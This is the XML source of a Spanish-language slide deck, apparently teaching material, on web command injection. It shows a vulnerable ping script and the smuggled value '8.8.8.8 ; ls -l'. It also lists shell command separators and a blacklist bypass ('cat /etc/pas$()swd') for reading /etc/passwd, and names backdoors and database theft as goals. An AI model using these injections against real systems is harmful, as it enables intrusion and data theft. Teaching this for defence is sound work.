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4" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="307" r:id="rId5"/>
    <p:sldId id="308" r:id="rId6"/>
    <p:sldId id="310" r:id="rId7"/>
    <p:sldId id="311" r:id="rId8"/>
    <p:sldId id="312" r:id="rId9"/>
    <p:sldId id="313" r:id="rId10"/>
    <p:sldId id="306" r:id="rId11"/>
    <p:sldId id="314" r:id="rId12"/>
    <p:sldId id="316" r:id="rId13"/>
    <p:sldId id="317" r:id="rId14"/>
    <p:sldId id="318" r:id="rId15"/>
    <p:sldId id="320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09" r:id="rId25"/>
    <p:sldId id="305" r:id="rId26"/>
    <p:sldId id="258" r:id="rId27"/>
    <p:sldId id="259" r:id="rId28"/>
    <p:sldId id="295" r:id="rId29"/>
    <p:sldId id="296" r:id="rId30"/>
    <p:sldId id="297" r:id="rId31"/>
    <p:sldId id="299" r:id="rId32"/>
    <p:sldId id="298" r:id="rId33"/>
    <p:sldId id="302" r:id="rId34"/>
    <p:sldId id="300" r:id="rId35"/>
    <p:sldId id="301" r:id="rId36"/>
    <p:sldId id="328" r:id="rId37"/>
    <p:sldId id="329" r:id="rId38"/>
    <p:sldId id="303" r:id="rId39"/>
    <p:sldId id="294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0016"/>
    <a:srgbClr val="58D17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B1851-E551-3030-6488-9880D4822F0C}" v="19" dt="2025-10-23T20:30:41.8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50289" y="2423477"/>
            <a:ext cx="6624955" cy="913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8033" y="1352486"/>
            <a:ext cx="5291234" cy="550551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1352549"/>
            <a:ext cx="5257799" cy="550544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775" y="5867400"/>
            <a:ext cx="1981199" cy="75247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971550" y="5648325"/>
            <a:ext cx="10248900" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10248900" h="47625">
                <a:moveTo>
                  <a:pt x="10248900" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10248900" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10248900" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CB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66825" cy="1047750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1266825" h="1047750">
                <a:moveTo>
                  <a:pt x="0" y="1047749"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1266824" y="1047749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1266824" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10477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71450"/>
            <a:ext cx="1485900" cy="695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0699" y="1754184"/>
            <a:ext cx="6070600" cy="172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5875" y="1154176"/>
            <a:ext cx="5827395" cy="433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9550" y="209550"/>
            <a:ext cx="11982450" cy="6648450"/>
            <a:chOff x="209550" y="209550"/>
            <a:chExt cx="11982450" cy="6648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0425" y="1333436"/>
              <a:ext cx="5386451" cy="5524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100" y="1352549"/>
              <a:ext cx="5257799" cy="55054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1550" y="3400425"/>
              <a:ext cx="10248900" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10248900" h="85725">
                  <a:moveTo>
                    <a:pt x="10248900" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10248900" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10248900" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CB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" y="5610225"/>
              <a:ext cx="3295649" cy="12477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3675" y="209550"/>
              <a:ext cx="1838324" cy="20954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1050289" y="2423477"/>
            <a:ext cx="6624955" cy="908517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sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> II: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyecciones</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" sz="4400" spc="-20" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea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210" y="3507423"/>
            <a:ext cx="3265804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400" dirty="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lang="es-ES" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Noach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> y Bona</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0" err="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EE30-2AAD-B94D-9170-6C38C1AD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C80858-51BF-6222-56E0-A720653A4219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706710C-8FF3-C447-85C6-025352F0F0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: Índice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06D89C6-920A-AAD4-A40B-F0EDFD190AB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1761659"/>
            <a:ext cx="7478395" cy="364971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27050" indent="-514350">
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CB0016"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Injection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FontTx/>
              <a:buAutoNum type="arabicPeriod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Concatenaciones de comandos</a:t>
            </a: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FontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Bypass</a:t>
            </a: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10" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Practice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> time</a:t>
            </a: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203649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43A5-67EC-AF15-FBFD-A481A1C6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7FC0C7-1241-5A18-9FC3-6F589D3EC404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B1A91ED-6B3C-B3A7-9603-123DED409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857D1E-BA0E-3755-970B-186D5AD2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73" y="1611923"/>
            <a:ext cx="9709639" cy="41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4E18-5DD7-8C21-1012-201556D6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19B340-E520-2D1D-4520-7BFCDDD49328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1E92D57-035B-BE16-246D-1CD270881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5729C0F-B832-E39E-D9CC-F00508ECCECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1742121"/>
            <a:ext cx="7478395" cy="4478149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¿Qué está pasando por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>detras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>?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IP = </a:t>
            </a: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get_ip_from_page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();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output = </a:t>
            </a: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execute_command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"ping –c 4" + $IP );</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill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print_in_page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output );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1458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0D13-8EA0-28AB-8D7B-E02033B2D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6232F0-F5C4-BB31-573E-13FEA556B6C7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7C6283-CC6B-06EE-3D75-2A028E5CA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B63B774-4D58-786E-C6F8-9DA6C4B68875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4478149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¿Qué está pasando por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>detras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>?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IP = </a:t>
            </a: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get_ip_from_page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();  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="76000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>// IP = 8.8.8.8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output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="18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execute_command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"ping –c 4" + $IP );        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="76000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>// ping –c 4 8.8.8.8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print_in_page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output );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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A cartoon of a person giving thumbs up&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671E6B76-50F5-5199-5F36-1673597A9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147" y="1532426"/>
            <a:ext cx="1372089" cy="10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0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8171-F313-B4B4-77D5-431311F4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E9C746-45A6-84BE-C74C-C7155A5E2978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00F4C51-6BA8-6A2C-03C3-29898D58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CA0B683-2E39-B7CE-F7A8-8DDB798F4273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4478149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¿Qué está pasando por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>detras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>?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IP = </a:t>
            </a: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get_ip_from_page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();  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>// IP = 8.8.8.8 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> –l 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output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>execute_command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"ping –c 4" + $IP );        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>// ping –c 4 8.8.8.8 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> –l 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print_in_page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>( output );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1800" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A cartoon of a person crying&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B1B1F1-C6E5-0FF7-D313-BF7750E0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162" y="1461844"/>
            <a:ext cx="1795830" cy="118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C7E71-B57D-993E-FE64-5A9E43294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6E5FAE-23FE-D65C-3704-02211A65034B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7E495B0-6458-3AA8-93CC-6A05FC2DE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29CF957-1FFE-0923-A6DF-04CD410E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00" r="-213" b="3395"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="678757" y="2520950"/>
            <a:ext cx="4981921" cy="3317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0653C47F-BD61-81D1-4724-FA3A8A77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329" y="2520950"/>
            <a:ext cx="5167842" cy="331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427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A236-4D1D-2D2F-3EE9-F6962AD4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DD80F8-04AB-5700-70DC-210544B676D1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0617264-4E18-CF4A-BDEC-7C049AC9C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8DE84BC-D62C-C480-E9E1-F920D8F1E6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4213550" y="1712814"/>
            <a:ext cx="3756318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Próximos pasos...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790B8D-F6BE-C27D-75F4-A09BCA8C1595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502832" y="3333749"/>
            <a:ext cx="2328333" cy="184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Leer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>archivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>servidor</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" sz="2000" err="1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F63AD-E74C-3048-01A3-736BCC6642E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4453139" y="4564671"/>
            <a:ext cx="2328333" cy="184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Crear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>una</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> backdoor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CE6AE-B888-69A2-EAF3-E55839BCE9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6348370" y="3050441"/>
            <a:ext cx="2328333" cy="184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ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Modificar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>página</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>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95764-A8D0-86D1-C3FC-BC936A2223AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9132601" y="4564672"/>
            <a:ext cx="2328333" cy="184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Robar la Base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C1ECF-A70C-5419-64D2-B4EA7EE9C918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9132601" y="1350595"/>
            <a:ext cx="2328333" cy="184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ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Instalar 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4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295D-B5BD-D5BA-43F5-ED11A7CA8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5EFCAC-EBE6-421E-720F-ECBB1D643941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2211E95-88BA-1FED-874B-79D7EE95D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452D4BE-BA43-C960-E1E3-491B14A0613D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448840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Concatenaciones de comandos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-4572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command1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  <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> command2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" spc="-25" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2F2F2F"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style"/>
              <a:ea typeface="Batang"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-4572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command1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  <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> command2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" spc="-25" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2F2F2F"/>
              </a:solidFill>
              <a:latin typeface="Bookman Old Style"/>
              <a:ea typeface="Batang"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-4572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command1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</a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> command2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-4572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command1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</a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> command2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-4572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command1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</a:rPr>
              <a:t>$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> command2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang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570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9663D-7188-DBC3-3E92-275757E1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D9EA091-7919-FD70-BC23-2D8245B7FBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8084607" y="270223"/>
            <a:ext cx="3188075" cy="279563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960"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4400" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>BYPASS</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="Batang"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4400" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>de</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="Batang"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="4400" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr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9795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B55A-C5B8-B21A-EC7F-03D32B9E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03E7CF-369D-3FE7-5360-4E23C14BC3D2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441711C-D893-CD56-E57B-D9772E1B8D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III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A109B10-B6AF-1A6C-3AD8-EA96D34BF9D2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5493812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Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>blacklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> de palabras</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>! Prohibido utilizar "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>pas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>$()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>swd</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
